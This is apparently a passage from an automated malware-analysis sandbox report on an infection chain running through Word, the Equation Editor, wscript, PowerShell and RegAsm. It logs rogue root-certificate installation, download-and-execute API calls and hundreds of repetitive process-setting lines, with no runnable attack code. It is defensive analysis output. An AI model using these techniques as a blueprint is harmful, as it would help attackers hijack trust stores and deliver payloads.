                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00451D54 push eax; ret 13_2_00451D61
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044B090 push eax; ret 14_2_0044B0A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044B090 push eax; ret 14_2_0044B0CC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00451D34 push eax; ret 14_2_00451D41
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00444E71 push ecx; ret 14_2_00444E81
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00414060 push eax; ret 15_2_00414074
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00414060 push eax; ret 15_2_0041409C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00414039 push ecx; ret 15_2_00414049
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004164EB push 0000006Ah; retf 15_2_004165C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00416553 push 0000006Ah; retf 15_2_004165C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00416555 push 0000006Ah; retf 15_2_004165C4

                  Persistence and Installation Behavior

                  barindex
                  Installs new ROOT certificates
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00406EEB ShellExecuteW,URLDownloadToFileW,9_2_00406EEB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,9_2_0041AADB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,9_2_0041CBE1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
